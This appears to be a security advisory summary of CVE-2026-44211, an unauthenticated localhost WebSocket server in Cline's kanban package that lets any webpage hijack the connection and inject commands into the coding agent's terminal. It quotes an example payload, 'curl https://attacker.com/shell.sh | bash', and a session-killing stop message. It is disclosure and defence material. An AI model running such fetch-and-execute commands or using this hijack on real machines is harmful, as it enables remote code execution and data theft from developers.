Cline Kanban — Cross-Origin WebSocket Hijack → RCE (CVE-2026-44211)

AI relevance: The kanban package bundled with Cline CLI starts a local WebSocket server with zero authentication or Origin validation, turning every Cline user's browser into a remote code execution target — simply by visiting a malicious webpage.

What happened

  • Researcher Sagilayani disclosed CVE-2026-44211 (CVSS 9.3) via GitHub Security Advisory GHSA-5c57-rqjx-35g2.
  • The kanban npm package (github.com/cline/kanban) binds a WebSocket server to 127.0.0.1:3484 when the Cline CLI is invoked with --kanban.
  • Three endpoints are exposed without authentication: /api/runtime/ws, /api/terminal/io, and /api/terminal/control.
  • WebSocket handshakes are not subject to the browser's same-origin policy or CORS checks: the browser sends an Origin header, but enforcing it is left to the server, so any webpage can silently connect to localhost.
  • On connection, the runtime endpoint immediately streams a full workspace snapshot: filesystem paths, git branches, task titles, and live AI agent chat messages.
  • The terminal I/O endpoint writes raw bytes directly into the agent's PTY — an attacker can inject curl https://attacker.com/shell.sh | bash and the agent executes it.
  • The control endpoint accepts {"type": "stop"} to kill any active agent session (denial of service).
  • Confirmed across macOS, Linux, and Windows on Firefox, Chrome, and Arc.
  • Root causes: CWE-306 (Missing Authentication) and CWE-1385 (Missing Origin Validation in WebSockets).

Why it matters

This is a textbook supply-chain risk: a convenience package (kanban UI for tracking agent tasks) becomes a persistent localhost backdoor. The attack requires only that the victim run Cline with kanban enabled and browse the web — no clicks, no downloads. Every developer using Cline in this configuration is effectively running an unauthenticated command server on their machine. No patched version exists at time of writing.

What to do

  • Disable the kanban server if you don't actively use it: avoid cline --kanban until a fix ships.
  • If you need kanban, run it in a network-isolated environment (no untrusted browser tabs open).
  • Watch the GitHub advisory for a patched release.
  • Security teams: add 127.0.0.1:3484 to your local service monitoring and alert if unexpected listeners appear on developer workstations.